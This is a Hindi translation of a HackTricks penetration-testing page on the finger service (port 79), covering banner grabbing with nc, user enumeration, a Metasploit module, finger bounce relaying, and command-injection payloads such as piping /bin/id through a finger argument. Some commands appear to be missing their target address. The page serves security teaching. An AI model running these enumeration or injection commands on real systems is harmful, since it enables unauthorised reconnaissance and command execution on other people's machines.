# 79 - पेंटेस्टिंग फिंगर
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS रेड टीम एक्सपर्ट) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज में.
## **मूल जानकारी**
**फिंगर** एक प्रोग्राम है जिसका उपयोग आप कंप्यूटर उपयोगकर्ताओं के बारे में जानकारी खोजने के लिए कर सकते हैं। यह आमतौर पर लॉगिन नाम, पूरा नाम, और संभवतः उपयोगकर्ता के बारे में अन्य विवरण सूचीबद्ध करता है जिसे आप फिंगर कर रहे हैं। इन विवरणों में कार्यालय का स्थान और फोन नंबर (यदि ज्ञात हो), लॉगिन समय, निष्क्रिय समय, मेल अंतिम बार कब पढ़ा गया था, और उपयोगकर्ता की योजना और प्रोजेक्ट फाइलें शामिल हो सकती हैं।
**डिफ़ॉल्ट पोर्ट:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **गणना**
### **बैनर ग्रैबिंग/मूल संबंध**
```bash
nc -vn 79
echo "root" | nc -vn 79
```
### **उपयोगकर्ता सूचीकरण**
```bash
finger @ #List users
finger admin@ #Get info of user
finger user@ #Get info of user
```
वैकल्पिक रूप से आप [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) से **finger-user-enum** का उपयोग कर सकते हैं, कुछ उदाहरण:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap डिफ़ॉल्ट स्क्रिप्ट्स का उपयोग करके स्क्रिप्ट निष्पादित करता है**
### Metasploit Nmap की तुलना में अधिक तरकीबें उपयोग करता है
```
use auxiliary/scanner/finger/finger_users
```
### Shodan
* `port:79 USER`
## आदेश निष्पादन
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## फिंगर बाउंस
[एक सिस्टम को फिंगर रिले के रूप में उपयोग करें](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।